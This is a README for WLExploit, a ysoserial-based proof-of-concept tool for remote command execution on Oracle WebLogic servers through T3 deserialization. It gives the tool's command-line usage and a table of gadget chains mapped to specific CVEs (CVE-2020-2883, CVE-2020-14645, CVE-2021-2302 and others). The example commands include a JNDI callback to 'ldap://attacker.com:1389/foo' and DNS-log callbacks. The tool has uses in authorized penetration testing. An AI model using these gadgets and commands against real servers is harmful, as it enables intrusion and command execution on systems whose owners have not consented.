
0xdu/WLExploit


WLExploit

A proof-of-concept tool for exploiting WebLogic via the T3 protocol, based on ysoserial.

Usage

$  java -jar WLExploit.jar
usage: WLExploit
 -c <arg>    Execute Command
 -g <arg>    Gadget
 -h <arg>    Target Host
 -https      Https or tls
 -os <arg>   Os Type [windows,linux]
 -p <arg>    Target Port
  Available gadget types:
     Gadget              CVE            Protocol Command Example              Description                                    
     -------             ------------   -------  ---------------------        ----------------------------------             
     Coherence1          CVE-2020-2883  T3       nslookup sub.dnslog.cn                                                      
     Coherence2          CVE-2020-2883  T3       nslookup sub.dnslog.cn       Other version of CVE-2020-2883                 
     Coherence3          CVE-2020-2884  T3       nslookup sub.dnslog.cn                                                      
     Coherence4          CVE-2020-14645 T3       ldap://attacker.com:1389/foo JNDI callback                                  
     Coherence5          CVE-2020-14644 T3       /path/to/exploit.class       Ref: https://www.codetd.com/en/article/11892503
     Coherence6          CVE-2021-2302  T3       nslookup sub.dnslog.cn       Oracle BI                                      
     CommonsCollections1                T3       nslookup sub.dnslog.cn                                                      
     CommonsCollections2                T3       nslookup sub.dnslog.cn                                                      
     CommonsCollections3                T3       nslookup sub.dnslog.cn                                                      
     CommonsCollections4                T3       nslookup sub.dnslog.cn                                                      
     CommonsCollections5                T3       nslookup sub.dnslog.cn                                                      
     CommonsCollections6                T3       nslookup sub.dnslog.cn                                                      
     CommonsCollections7                T3       nslookup sub.dnslog.cn                                                      
     URLDNS                             T3       http://sub.dnslog.cn    

Building

Requires Java 1.8+ and Maven 3.x+

mvn clean package -DskipTests
